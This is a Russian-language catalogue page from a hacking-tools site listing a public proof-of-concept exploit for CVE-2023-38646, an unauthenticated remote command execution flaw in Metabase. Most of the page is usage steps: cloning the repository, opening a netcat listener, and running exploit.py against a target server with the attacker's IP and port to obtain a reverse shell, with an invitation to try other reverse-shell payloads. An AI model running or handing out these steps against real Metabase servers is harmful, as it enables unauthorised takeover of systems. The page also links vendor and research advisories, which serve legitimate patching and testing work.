Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-38646 — Это скрипт Proof of Concept (PoC) для эксплуатации Metabase, инструмента с открытым исходным кодом для бизнес-аналитики и анализа данных. | Kitploit
Инструменты/GitHubGitHub/threathntr/cve-2023-38646
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubthreathntr/cve-2023-38646

CVE-2023-38646

Это скрипт Proof of Concept (PoC) для эксплуатации Metabase, инструмента с открытым исходным кодом для бизнес-аналитики и анализа данных.

Репозиторий
1112 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-38646 PoC

Описание

Это скрипт Proof of Concept (PoC) для эксплуатации Metabase — инструмента с открытым исходным кодом для бизнес-аналитики и анализа данных. Metabase позволяет пользователям визуализировать данные и взаимодействовать с ними, что делает его мощной платформой для анализа данных.

Эта уязвимость, обозначенная как CVE-2023-38646, позволяла злоумышленникам выполнять произвольные команды на сервере без какой-либо аутентификации. Последствия этой ошибки были серьёзными, поскольку она предоставляла несанкционированный доступ к серверу с уровнем привилегий сервера.

Шаги Proof of Concept (PoC)

Клонируйте этот репозиторий

root@kitploit:~
git clone https://github.com/threatHNTR/CVE-2023-38646.git

Перейдите в репозиторий

root@kitploit:~
cd CVE-2023-38646

Перед запуском скрипта настройте Netcat Listener

root@kitploit:~
nc -nlvp chosen-port

Запустите скрипт

root@kitploit:~
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port

Эксплуатация: Скрипт попытается отправить reverse shell на целевой сервер Metabase. В случае успеха вы получите shell на своей машине. Не стесняйтесь изменять payload, чтобы попробовать различные reverse shell.

Ссылки

  • GitHub Advisory: https://github.com/advisories/GHSA-jg32-8h6w-x7vg

  • Metabase Advisory: https://www.metabase.com/blog/security-advisory

  • Metabase GitHub: https://github.com/metabase/metabase

  • Assetnote Blog - Chaining our way to Pre-Auth RCE in Metabase: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

Скачать инструмент